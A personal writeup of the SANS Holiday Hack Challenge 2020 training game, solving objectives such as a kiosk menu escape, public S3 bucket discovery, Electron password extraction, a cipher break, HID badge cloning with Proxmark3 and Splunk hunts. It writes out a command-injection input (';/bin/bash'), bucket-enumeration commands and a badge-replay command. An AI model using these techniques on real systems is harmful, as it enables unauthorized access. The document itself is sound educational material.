SANS Holiday Hack Challenge 2020 Writeup

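This is a writeup of SANS Holiday Hack Challenge 2020, which was held from around December 14, 2020 to January 11, 2021.

What is the SANS Holiday Hack Challenge?

It is not a CTF where you simply grind through problems; it has a story. The challenges follow that story, and you solve them as you go. There are the main Objective challenges, and terminal challenges that give you hints for those Objectives.

Some of the terminal challenges are not hints for any Objective.

This year's story goes like this:

Last year's villain, the Tooth Fairy, had not come up with her plan herself; it was Jack Frost's doing.
This year's villain is that Jack Frost.
Santa's KringleCon castle has been expanded since last year and was bustling.
But there was something odd about Santa's behavior.

An overview of the story and of the SANS Holiday Hack Challenge is available on YouTube, so if you want the details, head over there.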

youtu.be

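Note that this writeup does not solve all of the terminal challenges. I solved the terminal challenges related to the main objectives, but I forgot about the rest. My goal this year was to see the end credits, so....

For the terminal challenges not covered here, @kusuwada has written a wonderful writeup that solves every challenge, so be sure to read that one too!!!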

tech.kusuwada.com

The Holiday Hack Challenge can still be played now, so if it sounds interesting, give it a try!!

Writeup

1) Uncover Santa's Gift List

Difficulty: 🎄
There is a photo of Santa's Desk on that billboard with his personal gift list. What gift is Santa planning on getting Josh Wright for the holidays? Talk to Jingle Ringford at the bottom of the mountain for advice.

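The question: the image of Santa's desk contains a gift list, so what is the gift for Josh Wright?

Jingle Ringford tells you about Photopea, a site for editing images online, so use that tool to undo the swirled part.

The image of Santa's desk is in the area where Jingle Ringford is.

Figure: photo of Santa's Desk

Select the swirled part with the lasso tool and apply "Filter" → "Distort" → "Twirl" to it, and you can see what the gift for Josh Wright is.

Figure: the gift list

It is still quite twisted, but the answer is proxmark.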

2) Investigate S3 Bucket

Difficulty: 🎄
When you unwrap the over-wrapped file, what text string is inside the package? Talk to Shinny Upatree in front of the castle for hints on this challenge.

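What is the text string inside the package? Shinny Upatree in front of the castle gives hints for this challenge.

Going to Shinny Upatree, you find two terminals: Kringle Kiosk and Investigate S3 Bucket.

Talking to Shinny Upatree, you are told: "If you access the Kringle Kiosk you can get a map, find out where the elves are, and get a badge. But there is some kind of problem with it." So the next step is to beat the Kringlecon Kiosk.

Kringlecon Kiosk

Accessing the Kringlecon Kiosk first shows a notice and then the menu screen below. Option 1 is the castle map and option 3 shows where the elves are, so saving them to a text file made things easier later on.

The notice says to try running bash, so the goal is to launch bash from this menu.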

Welcome to our castle, we're so glad to have you with us!
Come and browse the kiosk; though our app's a bit suspicious.
Poke around, try running bash, please try to come discover,
Need our devs who made our app pull/patch to help recover?
Escape the menu by launching /bin/bash
Press enter to continue...

 Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit
Please select an item from the menu by entering a single number.
Anything else might have ... unintended consequences.
Enter choice [1 - 5] 

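The menu only accepts 1-5 as input, so I looked for somewhere I could misbehave. The name prompt in "4. Print Name Badge" accepts free-form input, so I wondered whether bash could be launched from there.

To cut to the conclusion, entering ;/bin/bash as the name is all it takes. I figured that if the name it receives is being printed by an OS command or the like, then adding ; might make it accept another command, tried it, and it worked.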

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit
Please select an item from the menu by entering a single number.
Anything else might have ... unintended consequences.
Enter choice [1 - 5] 4
Enter your name (Please avoid special characters, they cause some weird errors)...;/bin/bash
 _______________________
< Santa's Little Helper >
 -----------------------
  \
   \   \_\_    _/_/
    \      \__/
           (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||
   ___                                                      _    
  / __|   _  _     __      __      ___     ___     ___     | |   
  \__ \  | +| |   / _|    / _|    / -_)   (_-<    (_-<     |_|   
  |___/   \_,_|   \__|_   \__|_   \___|   /__/_   /__/_   _(_)_  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_| """ | 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
Type 'exit' to return to the menu.
shinny@559359319b4f:~$ 

After launching bash, talk to Shinny Upatree again to get the hint for Objective 2.
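
The mistake that lets ;/bin/bash work, next to a hardened version, as an added Python example (not the kiosk's real code, which this writeup does not show). The function names are hypothetical, printf stands in for whatever command the kiosk uses to print the badge, and a harmless marker replaces /bin/bash.

```python
import re
import subprocess

# Allow-list for badge names: letters, digits, space and a little punctuation.
NAME_RE = re.compile(r"[A-Za-z0-9 .'-]{1,40}")


def badge_vulnerable(name: str) -> str:
    """Hypothetical kiosk handler: the name is pasted into a shell command line.

    The shell parses the whole string, so ';' ends the intended command and
    the rest of the "name" runs as a second command.
    """
    done = subprocess.run(f"printf '%s\\n' {name}", shell=True,
                          capture_output=True, text=True)
    return done.stdout


def badge_argv(name: str) -> str:
    """Same output, but the name is a single argv element and no shell runs."""
    done = subprocess.run(["printf", "%s\n", name],
                          capture_output=True, text=True, check=True)
    return done.stdout


def badge_hardened(name: str) -> str:
    """Reject anything outside the allow-list, then print without a shell."""
    if not NAME_RE.fullmatch(name):
        raise ValueError("name contains characters outside the allow-list")
    return badge_argv(name)


if __name__ == "__main__":
    probe = "Santa;echo INJECTED"  # constructed input, harmless marker command
    print("shell string :", repr(badge_vulnerable(probe)))
    print("argv list    :", repr(badge_argv(probe)))
    try:
        badge_hardened(probe)
    except ValueError as err:
        print("allow-list   :", err)
```

With the shell string the marker command runs; with an argv list the same input is printed back as plain text.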

Investigate S3 Bucket

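Opening the Investigate S3 Bucket terminal prints a message, and listing the files shows a TIPS file, so I displayed that too.

It tells you that this challenge is self-contained within the terminal and that the data assets are in the cloud.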

Can you help me? Santa has been experimenting with new wrapping technology, and
we've run into a ribbon-curling nightmare!
We store our essential data assets in the cloud, and what a joy it's been!
Except I don't remember where, and the Wrapper3000 is on the fritz!
Can you find the missing package, and unwrap it all the way?
Hints: Use the file command to identify a file type. You can also examine
tool help using the man command. Search all man pages for a string such as
a file extension using the apropos command.
To see this help again, run cat /etc/motd.
elf@f1f2de7874aa:~$ ls
TIPS  bucket_finder
elf@f1f2de7874aa:~$ cat TIPS
# TIPS
- If you need an editor to create a file you can run nano (vim is also
  available).
- Everything you need to solve this challenge is provided in this terminal
  session.
elf@f1f2de7874aa:~$ 

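Next, the README in the bucket_finder directory shows that a tool is provided that finds publicly accessible S3 buckets and downloads from them.

Looking into it, this turns out to be a publicly available tool, and searching for it turns up how to use it as well as an explanation of Amazon S3 buckets.

Blog, Whats in Amazon's buckets? - DigiNinja

According to the article above, S3 bucket URLs are mapped to regions, and if you access a bucket located in Ireland through the Tokyo URL, you are redirected.

So this tool checks, following redirects, whether a bucket is public or private, and downloads its contents if it is public.

From here, all that is left is to guess the S3 bucket name and run the tool. Wrapper3000, shown in green text when first accessing the terminal, looks suspicious, so I added it to the wordlist and ran the tool.

Note: S3 bucket names are all lowercase, so the W is lowercased.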

elf@f1f2de7874aa:~/bucket_finder$ cat wordlist 
kringlecastle
wrapper
santa
wrapper3000
elf@f1f2de7874aa:~/bucket_finder$ ./bucket_finder.rb --download --region us wordlist 
http://s3.amazonaws.com/kringlecastle
Bucket found but access denied: kringlecastle
http://s3.amazonaws.com/wrapper
Bucket found but access denied: wrapper
http://s3.amazonaws.com/santa
Bucket santa redirects to: santa.s3.amazonaws.com
http://santa.s3.amazonaws.com/
        Bucket found but access denied: santa
http://s3.amazonaws.com/wrapper3000
Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 )
        <Downloaded> http://s3.amazonaws.com/wrapper3000/package
elf@f1f2de7874aa:~/bucket_finder$ ls
README  bucket_finder.rb  wordlist  wrapper3000
elf@f1f2de7874aa:~/bucket_finder$ 

A public S3 bucket was found. Its contents look like a Base64 string, and writing the decoded data to a file shows that it is a zip file.

elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ cat package | base64 -d >> file.dat
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ file file.dat
file.dat: Zip archive data, at least v1.0 to extract
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ unzip file.dat
Archive:  file.dat
 extracting: package.txt.Z.xz.xxd.tar.bz2  

Running unzip writes out a file named package.txt.Z.xz.xxd.tar.bz2. It has presumably been encoded in each of those formats, so I simply undid them one by one.

elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ tar -xvf package.txt.Z.xz.xxd.tar.bz2 
package.txt.Z.xz.xxd
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ xxd -r package.txt.Z.xz.xxd > package.txt.Z.xz
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ xz -d package.txt.Z.xz
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ uncompress package.txt.Z
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ cat package.txt
North Pole: The Frostiest Place on Earth

The answer is North Pole: The Frostiest Place on Earth

3) Point-of-Sale Password Recovery

Difficulty: 🎄
Help Sugarplum Mary in the Courtyard find the supervisor password for the point-of-sale terminal. What's the password?

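Going to Sugarplum Mary, there are two terminals, Linux Primer and Santa shop. I guessed that solving Linux Primer would get a hint for Santa shop.

Linux Primer

On launch it says a munchkin stole the lollipops, so catch the munchkins. It also says that typing hintme gives a hint.

You are given questions about Linux commands and just answer them.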

Q. Perform a directory listing of your home directory to find a munchkin and retrieve a lollipop!
$ ls
Q. Now find the munchkin inside the munchkin.
$ cat munchkin_19315479765589239
Q. Great, now remove the munchkin in your home directory.
$ rm munchkin_1931547976558923
Q. Print the present working directory using a command.
$ pwd
Q. Good job but it looks like another munchkin hid itself in you home directory. Find the hidden munchkin!
$ ls -la
Q. Excellent, now find the munchkin in your command history.
$ history
Q. Find the munchkin in your environment variables.
$ export
Q. Next, head into the workshop.
$ cd workshop
Q. A munchkin is hiding in one of the workshop toolboxes. Use "grep" while ignoring case to find which toolbox the munchkin is in.
$ grep -rni "munchkin" *
Q. A muchkin is blocking the lollipop_engine from starting. Run the lollipop_engine binary to retrieve this munchkin.
$ chmod +x lollipop_engine
$  ./lollipop_engine
Q. Munchkins have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0.
$ cd electrical/
$ mv blown_fuse0 fuse0
Q. Now, make a symbolic link (symlink) named fuse1 that points to fuse0
$ ln -s fuse0 fuse1
Q. Make a copy of fuse1 named fuse2.
$ cp fuse1 fuse2
Q. We need to make sure munchkins don't come back. Add the characters "MUNCHKIN_REPELLENT" into the file fuse2.
$ echo "MUNCHKIN_REPELLENT"  >> fuse2
Q. Find the munchkin somewhere in /opt/munchkin_den
$  find ./ -iname '*munchkin*'
Q. Find the file somewhere in /opt/munchkin_den that is owned by the user munchkin.
$ id munchkin
uid=1052(munchkin) gid=1052(munchkin) groups=1052(munchkin)
$ find ./ -uid 1052
Q. Find the file created by munchkins that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/munchkin_den.
$ find ./ -size -110k -size +108k
Q. List running processes to find another munchkin.
$ ps aux
Q. The 14516_munchkin process is listening on a tcp port. Use a command to have the only listening port display to the screen.
$ netstat -napt 80
Q. The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last munchkin.
$ curl localhost:54321
Q. Your final task is to stop the 14516_munchkin process to collect the remaining lollipops.
$ kill 23343
Congratulations, you caught all the munchkins and retrieved all the lollipops!
Type "exit" to close...

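After answering all of these, talking to Sugarplum Mary gets you the hint.

Santa shop

Opening the Santa shop terminal hands you an exe that can be used offline. Running it in a suitable virtual machine shows that it is the installer for Santa shop.

After installing and running it, it asks for a password.

Figure: Santashop

From the icon I thought it looked like an app built with Electron, and the hint from Linux Primer also says it is an Electron app.

The hints also say that a tool called asar reveals the source code, and include a guide on how to use it.

So all that is left is to extract the source code.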

C:\Users\user>cd C:\Users\user\AppData\Local\Programs\santa-shop

C:\Users\user\AppData\Local\Programs\santa-shop>cd resources

C:\Users\user\AppData\Local\Programs\santa-shop\resources>mkdir sourcecode

C:\Users\user\AppData\Local\Programs\santa-shop\resources>asar extract app.asar sourcecode

C:\Users\user\AppData\Local\Programs\santa-shop\resources>

The figure below shows what was extracted. The password is written in main.js.

santapass

Figure: SantaShop source

4) Operate the Santavator

Difficulty: 🎄🎄
Talk to Pepper Minstix in the entryway to get some hints about the Santavator.

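It says to talk to Pepper Minstix to get hints about the Santavator.

Talking to Pepper Minstix, you are told that a tmux session got detached and that is causing trouble. Attaching to it from the terminal next to them should do it.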

Unescape Tmux

$ tmux ls
0: 1 windows (created Thu Jan 14 14:53:24 2021) [80x24]
$ tmux a -t 0
..............................'.''''''.'''''''''''''
.........................................'''''''''''
................................,:lccc:;,'...'''''''
.............................';loodxkkxxdlc;'..'''''
............................,:ccllcldx0dxxdoc..'''''
...........................;ccclooodkOkok0OOx:..''''
.........................':cccllodxxkkkOkxdxx;....''
........................,cccllooddxkOOOkOxoo'.....''
......................';:cclllccllodO0Okkkx;...'''..
.....................:llollclclccccclokc::'.........
...................;ddollllllllcccccccl;............
..................:xdooddoooolclllllolld;...........
.................'xxoodxxxdoooooooxkdooox'..........
.................,xxkxdxkkxxdddddddxkkxdxl....'.....
.................'xOkooddxkkxxdddxxkkxxxxx'.......'.
..................oOkddxkkkkdxxdddxxxxxxdd:......'.'
.................';k0xxkxxOxdddddoodxdxkkx:....'''''
................'',o0xdddxkxdxdodddddkkkxxc....'''''
................',,:OK0kkOOxddddxxxddxxkxd:'''''''''
.............',;:cccdKXKOkkOOxkxdxxxxxxkOx;'''''''''
...........:oxdddxkkxOXXOxxkxxkkkkkkkxxdxx,,''''''''
.......''':c:,..'coodOO00OOOO00kxOkK0KkO0d,,''''''''
...;cllc::clddooddOkxoccccccloddxxO0KK0KKOc:;,''''''
'ldolcc:::lldxkOxkO000OOOOkkxxdddxoooooooooodxxxddol
xxlcc:::::xolldddxOOdddxxxkkOOO0000000xkOkkxddoooooo
lo:::cccc::ldoodooxd,;lxxkkO0OOOOOOOOOOOOOO000000000
locclccccccccldkxdkk:,;cdxkOKXXXKKKKKXXKk::::cllodxk
xxollllcccllcodkOkO0:,,,:dkOOKKXXXKKKXXKl,,'''''''''
xxkolllllllllodkO0KO;,,,;;lxO00KKXKKKKK0c;,,,,,,,,,,
,dxxxdoooollodxk0KOolc:::::cdO00KK00K000c;,,,,,,,,,;
..:xkOOkdoxxkOO0OxoooooolooodxOO00Ok0kk0oc:;;;;;;;;;
....:dkOddOO0OkdoolllllloooddxOOOOOkkkkOdllccccccccc
You found her! Thank you!!!

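Talking again afterwards, you learn that operating the Santavator needs a key and red, blue, and yellow bulbs. For the key, you are told to ask Sparkle Redberry.

Talking to Sparkle Redberry in front of the elevator, you are told how to use the Santavator. You steer the light so that green, red, and yellow light flows in.

That is what the bulbs are for. I found these bulbs while wandering around Kringlecon Castle, so I forget exactly where they were, but the green bulb can be obtained without using the Santavator, the red bulb was in Talks, which you can reach after lighting green, and I think the yellow bulb was on the roof or in the Workshop, which you can reach after lighting red and green.

You also find various other objects, so make use of them to light everything up.

Figure: Santavator

That clears it.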

5) Open HID Lock

Difficulty: 🎄🎄
Open the HID lock in the Workshop. Talk to Bushy Evergreen near the talk tracks for hints on this challenge. You may also visit Fitzy Shortstack in the kitchen for tips.

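Objective 5 says to open the HID lock in the Workshop, but there is no button for the Workshop floor, so I cannot get there. So I decided to go see Bushy Evergreen for hints. Apparently Fitzy Shortstack also has something to offer.

Speaker UNPrep

Going to see Bushy Evergreen, he is trying to open a door but cannot solve the problems Alabaster Snowball made. There are three of them, so I solved them in order.

Question 1

Running the ./door program asks for a password.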

$ ./door
You look at the screen. It wants a password. You roll your eyes - the 
password is probably stored right in the binary. There's gotta be a
tool for this...
What do you enter? > hello  
Checking......
Beep boop invalid password

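Random input fails, but Bushy Evergreen says something like "how do you look at the strings inside a binary?", so using the strings command finds the password.

The password is Op3nTheD00r

Question 2

Clearing question 1 gets a hint. Apparently the door was already open at this point, but I did not notice. The conversation says something like "the lights are off too, so please help", so next I took on the lights program.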

$ ./lights 
The speaker unpreparedness room sure is dark, you're thinking (assuming
you've opened the door; otherwise, you wonder how dark it actually is)
You wonder how to turn the lights on? If only you had some kind of hin---
 >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lights.conf
---t to help figure out the password... I guess you'll just have to make do!
The terminal just blinks: Welcome back, elf-technician
What do you enter? > hello
Checking......
Beep boop invalid password

It seems to use lights.conf, so I looked at that lights.conf.

$ cat ./lights.conf 
password: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124
name: elf-technician

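lights.conf contains a password and a name. lights.conf can be rewritten in the lab directory, but I was quite stuck on what to do from there.

The conclusion: set lights.conf as shown below and run the program, and you get the password. CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED was the biggest hint.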

~/lab $ cat lights.conf 
name: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124
password: elf-technician
~/lab $ ./lights
The speaker unpreparedness room sure is dark, you're thinking (assuming
you've opened the door; otherwise, you wonder how dark it actually is)
You wonder how to turn the lights on? If only you had some kind of hin---
 >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lab/lights.conf
---t to help figure out the password... I guess you'll just have to make do!
The terminal just blinks: Welcome back, Computer-TurnLightsOn
What do you enter? > 

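The part that used to show elf-technician now shows Computer-TurnLightsOn. In short, the program decrypts whatever is encrypted in the name or the password, so swapping the name and the password reveals the password.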

$ ./lights
The speaker unpreparedness room sure is dark, you're thinking (assuming
you've opened the door; otherwise, you wonder how dark it actually is)
You wonder how to turn the lights on? If only you had some kind of hin---
 >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lights.conf
---t to help figure out the password... I guess you'll just have to make do!
The terminal just blinks: Welcome back, elf-technician
What do you enter? > Computer-TurnLightsOn
Checking......
Lights on!

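Question 3

Finally, take on the vending machine.

Deleting vending-machines.json in the lab directory and running the program makes it ask for a name and a password, and the password is written out encrypted. Working out how this encryption works should yield the answer.

Here too the hint asks something like "what happens if you enter AAAAAAAA?", so I tried A*10. From the 9th character on, the output matches the output from the 1st character. Once you see that it is a classical cipher with an 8-character shift, all that remains is to obtain the mapping. Python is available on the KringleCon terminal, but it is not easy to use there, so I wrote a program based on the mapping table and was done.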

 ~/lab $ ./vending-machines 
The elves are hungry!
If the door's still closed or the lights are still off, you know because
you can hear them complaining about the turned-off vending machines!
You can probably make some friends if you can get them back on...
Loading configuration from: /home/elf/lab/vending-machines.json
I wonder what would happen if it couldn't find its config file? Maybe that's
something you could figure out in the lab...
ALERT! ALERT! Configuration file is missing! New Configuration File Creator Activated!
Please enter the name > hello
Please enter the password > AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJ
KKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXX
XXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkk
llllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyy
yyyy00000000111111112222222233333333444444445555555566666666777777778888888899999999
Welcome, hello! It looks like you want to turn the vending machines back on?
Please enter the vending-machine-back-on code > AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHH
HHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUU
VVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiii
iiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvv
wwwwwwwwxxxxxxxxyyyyyyyy00000000111111112222222233333333444444445555555566666666777777778888888899999999
Checking......
That would have enabled the vending machines!
If you have the real password, be sure to run /home/elf/vending-machines
elf@b55d9572419c ~/lab $ cat ./vending-machines.json 
{
  "name": "hello",
  "password": "XiGRehmwDqTpKv7fLbn3UP9Wyv09iu8Qhxkr3zCnHYNNLCeOSFJGRBvYPBubpHYVzka18jGrEA24nILqF14D1GnMQKdxFbK363iZBrdjZE8IMJ3ZxlQsZ4Uisdwjup68mSyVX10sI2SHIMBo4gC7VyoGNp9Tg0akvHBEkVH5t4cXy3VpBslfGtSz0PHMxOl0rQKqjDq2KtqoNicv9VbtacpgGUVBfWhPe9ee6EERORLdlwWbwcZQAYue8wIUrf5xkyYSPafTnnUgokAhM0sw4eOCa8okTqy1o63i07r9fm6W7siFqMvusRQJbhE62XDBRjf2h24c1zM5H8XLYfX8vxPy5NAyqmsuA5PnWSbDcZRCdgTNCujcw9NmuGWzmnRAT7OlJK2X7D7acF1EiL5JQAMU3ehm9ZFH2rDO5LkIpWFLz5zSWJ1YbNtlgophDlgKdTzAYdIdjOx0OoJ6JItvtUjtVXmFSQw4lCgPE6x7"
}

import string

# Chosen plaintext typed at the password prompt: each of A-Z, a-y and 0-9 repeated 8 times
map = "".join(c * 8 for c in string.ascii_uppercase + string.ascii_lowercase[:25] + string.digits)
map_enc ="XiGRehmwDqTpKv7fLbn3UP9Wyv09iu8Qhxkr3zCnHYNNLCeOSFJGRBvYPBubpHYVzka18jGrEA24nILqF14D1GnMQKdxFbK363iZBrdjZE8IMJ3ZxlQsZ4Uisdwjup68mSyVX10sI2SHIMBo4gC7VyoGNp9Tg0akvHBEkVH5t4cXy3VpBslfGtSz0PHMxOl0rQKqjDq2KtqoNicv9VbtacpgGUVBfWhPe9ee6EERORLdlwWbwcZQAYue8wIUrf5xkyYSPafTnnUgokAhM0sw4eOCa8okTqy1o63i07r9fm6W7siFqMvusRQJbhE62XDBRjf2h24c1zM5H8XLYfX8vxPy5NAyqmsuA5PnWSbDcZRCdgTNCujcw9NmuGWzmnRAT7OlJK2X7D7acF1EiL5JQAMU3ehm9ZFH2rDO5LkIpWFLz5zSWJ1YbNtlgophDlgKdTzAYdIdjOx0OoJ6JItvtUjtVXmFSQw4lCgPE6x7"
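# Split both strings into 8-character blocks. Block k of map_enc is the
# encryption of 8 copies of symbol k, so column p of every block shows the
# substitution used at password position p (mod 8).
map_lis = [map[i:i+8] for i in range(0, len(map), 8)]
map_enc_lis = [map_enc[i:i+8] for i in range(0, len(map_enc), 8)]
pass_enc = "LVEdQPpBwr"  # encrypted password to decrypt
ans = ""
for i, ch in enumerate(pass_enc):
    col = i % 8  # the substitution repeats every 8 characters
    for plain_block, enc_block in zip(map_lis, map_enc_lis):
        if enc_block[col] == ch:
            ans += plain_block[0]
print(ans)
# CandyCane1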

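The answer is CandyCane1

HID Unlock

Having solved the problems up to here, I noticed that I could enter the door next to it, and obtained the elevator button for the Workshop. That earned me the right to attempt the challenge.

Moving to the Workshop area this time, the door to the Workshop room is closed, so evidently this is the door to open.

Clearing question 1 (door) of Speaker UNPrep tells you that a Proxmark3 is needed to solve this challenge. After trying various things I realized that this challenge is about using the Proxmark to simulate the code that opens the door (at first I had no idea what to do).

Picking up the Proxmark3 in the Wrapping Room lets you open a terminal via Open Proxmark3 CLI.

Figure: Proxmark3

That alone does not tell me how to emulate anything, so I watched a YouTube video.

www.youtube.com

Around the 13-minute mark of the video above, it shows how to read a card and how to simulate it. So the idea is to read the cards the elves are carrying and simulate them against the locked door.

Looking around, I found three people's cards. There may be more, but the door opened with what I had found, so I did not look further.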

#db# TAG ID: 2006e22f10 (6024) - Format Len: 26 bit - FC: 113 - Card: 6024
#db# TAG ID: 2006e22f0e (6023) - Format Len: 26 bit - FC: 113 - Card: 6023
#db# TAG ID: 2006e22f0d (6022) - Format Len: 26 bit - FC: 113 - Card: 6022
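
What those TAG ID values contain, as an added Python example (not part of the original writeup): it decodes the low 26 bits of each ID as the standard 26-bit Wiegand layout (H10301), checks both parity bits, and compares the result with the FC and Card values Proxmark printed. The assumption is that the bits above the 26-bit payload are framing and can be ignored; the function names are hypothetical.

```python
import re

# Proxmark3 output lines copied from the writeup above.
PM3_LINES = """\
#db# TAG ID: 2006e22f10 (6024) - Format Len: 26 bit - FC: 113 - Card: 6024
#db# TAG ID: 2006e22f0e (6023) - Format Len: 26 bit - FC: 113 - Card: 6023
#db# TAG ID: 2006e22f0d (6022) - Format Len: 26 bit - FC: 113 - Card: 6022
"""

LINE_RE = re.compile(
    r"TAG ID: (?P<tag>[0-9a-fA-F]+) \(\d+\) - Format Len: (?P<bits>\d+) bit"
    r" - FC: (?P<fc>\d+) - Card: (?P<cn>\d+)"
)


def decode_h10301(tag_id_hex: str) -> dict:
    """Decode the low 26 bits of a tag ID as 26-bit Wiegand (H10301).

    Layout, most significant bit first:
      1 even-parity bit | 8-bit facility code | 16-bit card number | 1 odd-parity bit
    The even-parity bit covers the first 12 data bits, the odd-parity bit the last 12.
    """
    payload = int(tag_id_hex, 16) & ((1 << 26) - 1)
    upper13 = payload >> 13        # leading parity bit + first 12 data bits
    lower13 = payload & 0x1FFF     # last 12 data bits + trailing parity bit
    even_ok = bin(upper13).count("1") % 2 == 0
    odd_ok = bin(lower13).count("1") % 2 == 1
    return {
        "fc": (payload >> 17) & 0xFF,
        "cn": (payload >> 1) & 0xFFFF,
        "parity_ok": even_ok and odd_ok,
    }


def check_lines(text: str) -> list:
    """Parse each Proxmark line and compare its FC/Card with our own decoding."""
    results = []
    for m in LINE_RE.finditer(text):
        decoded = decode_h10301(m["tag"])
        decoded["tag"] = m["tag"]
        decoded["matches_pm3"] = (decoded["fc"] == int(m["fc"])
                                  and decoded["cn"] == int(m["cn"]))
        results.append(decoded)
    return results


if __name__ == "__main__":
    for row in check_lines(PM3_LINES):
        print(row)
```

The three badges differ only in a sequential card number, and the only protection in the 26 bits is parity; nothing in the value is secret.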

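Typing the command lf hid sim -r 2006e22f0e --fc 113 --cn 6023 near the Workshop door opened the adjacent door.

Going through the door, I became Santa.

Figure: Santa

I see. A message had said that some objects may only be touched by Santa, so from here on you control Santa.

Oh, maybe the reason the elves said in the prologue that Santa was acting strangely is that the player controls Santa?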

6) Splunk Challenge

Difficulty: 🎄🎄🎄
Access the Splunk terminal in the Great Room. What is the name of the adversary group that Santa feared would attack KringleCon?

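Access the Splunk terminal in the Great Room and identify the name of the adversary group that Santa thinks will attack KringleCon.

The Splunk terminal, which could not be used when not Santa, can now be opened, and opening it shows Training Questions and a Challenge Question.

Start with the Training Questions. It looks like you search Splunk for each question and write in the answer. There are many questions, so although I actually worked through them by trying various queries, I will just briefly list the queries and answers.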

Q1. How many distinct MITRE ATT&CK techniques did Alice emulate?

| tstats count where index=* by index 
| search index=T*-win OR T*-main
| rex field=index "(?<technique>t\d+)[\.\-].0*" 
| stats dc(technique)

Answer: 13

Q2. What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)

| tstats count where index=t1059.003* by index 

Answer: t1059.003-main t1059.003-win

Q3. One technique that Santa had us simulate deals with 'system information discovery'. What is the full name of the registry key that is queried to determine the MachineGuid?

This can be found by looking at the GitHub page.

Answer: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography

Q4. According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)

It asks about what relates to OSTAP, so search for OSTAP and answer with the oldest one.

index = attack
| search "Test Name" = OSTAP*

Answer: 2020-11-30T17:44:15Z

Q5. One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?

Looking at the GitHub code mentioned in the question turns up a command called WindowsAudioDevice-Powershell-Cmdlet, so search for that.

index=T1123*
| search EventCode=1
| search WindowsAudioDevice-Powershell-Cmdlet

Answer: 3648

Q6. Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?

Looking it up shows that attacks involving registry keys are T1547. Then try searching with Sysmon event ID 13, which relates to the registry.

index = T1547*
| search EventCode=13

This shows that the following command is being run, so actually look at it and enter its last command. https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat

Answer: quser

Q 7. According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?

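Alice gives a hint, so I ran a modified version of that query. It returns a large number of results, but the first one has win-dc-748.attackrange.local in certificate.issuer; I thought that looked like a match, entered it, and it was correct.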

index=* sourcetype=bro* "certificate.serial"=*
{ [-]
   certificate.exponent: 65537
   certificate.issuer: CN=win-dc-748.attackrange.local
   certificate.key_alg: rsaEncryption
   certificate.key_length: 2048
   certificate.key_type: rsa
   certificate.not_valid_after: 2021-05-29T01:08:57.000000Z
   certificate.not_valid_before: 2020-11-27T01:08:57.000000Z
   certificate.serial: 55FCEEBB21270D9249E86F4B9DC7AA60
   certificate.sig_alg: sha256WithRSAEncryption
   certificate.subject: CN=win-dc-748.attackrange.local
   certificate.version: 3
   id: Fen0DH2KtOxQwt4BFk
   ts: 2020-11-30T21:03:50.409634Z
}

Answer: 55FCEEBB21270D9249E86F4B9DC7AA60

Challenge Q. What is the name of the adversary group that Santa feared would attack KringleCon?

